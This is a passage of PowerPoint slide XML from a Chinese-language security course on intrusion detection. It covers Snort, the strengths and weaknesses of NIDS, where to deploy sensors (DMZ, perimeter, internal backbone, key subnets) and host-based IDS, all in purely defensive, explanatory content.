              <a:t>蜜网系统存在一定的风险，和我们在设置蜜罐</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>蜜网系统时必须考虑的问题。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="189564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altLang="en-US" sz="1200" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32007524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en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SNORT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>是一个功能强大的轻量级网络入侵检测系统，其具备实时数据流分析能力，能够进行协议分析和内容搜索及匹配。具有良好的可扩展性和可移植性，遵循通用公共许可证，任何组织和个人都可以自由使用，最重要的是，其入侵检测规则是完全开放的，这对于入侵检测技术的学习和研究具有很好的价值。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>有兴趣的同学，可以在官网上获取更多的信息。</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总结</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>NIDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的特点，其优缺点也比较明显。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>NIDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的优点包括；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>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可以提供实时的网络行为检测；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>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可以同时保护多台网络主机；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>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具有良好的隐蔽性；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>有效保护入侵证据；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>5. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>不影响被保护主机的性能。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>其缺点主要包括：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>在交换式网络环境中难以配置；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>检测性能受硬件条件限制；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>不能处理加密后的数据。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4111501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黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>基于网络的入侵检测系统可以在网络的多个位置进行部署。可以划分为</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个位置：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>DMZ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>区</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>外网入口</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>内网主干</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>关键子网</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3156294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2400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>DMZ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>区部署点在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>DMZ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>区的总口上，这是入侵检测器最常见的部署位置。在这里入侵检测器可以检测到所有针对用户向外提供服务的服务器进行攻击的行为。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>优点：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>检测已经渗入过第一层防御体系的来自外部的攻击；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>容易检测网络防火墙的性能并找到配置策略中的问题；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>所检测的对象集中于关键的服务设备；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>即使进入的攻击行为不可识别，入侵检测系统经过正确的配置也可以从被攻击主机的反馈中获得受到攻击的信息。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1913632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90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>位于防火墙之前，可以检测所有进出防火墙外网口的数据。在这个位置上，入侵检测器可以检测到所有来自外部网络的可能的攻击行为并进行记录。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>缺点：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>性能不理想；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>对进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>NAT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>的访问来说不易定位源或目的地址。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>优点：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>可以记录最为原始的攻击数据包；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>可以记录针对目标网络的攻击类型。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="272575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德国的一位军事理论家曾经说过：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>进攻，就是最好的防守</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在网络安全领域，我们也需要</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN"/>
              <a:t>一种更加积极主动的网络安全防护技术，它能够：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、及时监控网络中的数据传输和设备状态；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、实时报告网络异常；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、在发现网络异常时能够迅速采取主动的反应措施等等。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>入侵检测就是这样一种主动安全防护技术。</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90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>最常用的部署位置，主要检测内网流出和经过防火墙过滤后流入内网的网络数据。可以检测所有通过防火墙进入的攻击以及内部网向外部的不正常操作，并且可以准确地定位攻击的源和目的，方便系统管理员进行针对性的网络管理。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>缺点：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>由于防火墙的过滤作用，入侵检测器并不能记录下所有可能的入侵行为。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>优点：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>提高了检测攻击的识别可能；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>检测内网可信用户的越权行为；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>实现对内部网络信息的检测。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1309173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2400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>在内部网中，总有一些子网因为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>存在关键性数据和服务</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>，需要更严格的管理，比如资产管理子网、财务子网、员工档案子网等，这些子网是整个网络系统中的关键子网。通过对这些子网进行安全检测，可以检测到来自内部以及外部的所有不正常的网络行为，这样可以有效地保护关键的网络不会被外部或没有权限的内部用户侵入，造成关键数据泄漏或丢失。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>优点：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>由于关键子网位于内网的内部，因此流量相对要小一些，可以保证入侵检测器的有效检测。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>集中资源检测针对关键系统和资源的来自企业内外部的攻击；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>将有限的资源进行有效部署，获取最高的使用价值。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3339344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基于主机的入侵检测系统，主要用来保护</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>单台主机不受网络攻击行为的侵害，需要安装在被保护的主机上。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>按照检测对象的不同，分为：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、网络连接检测；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、主机系统检测。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
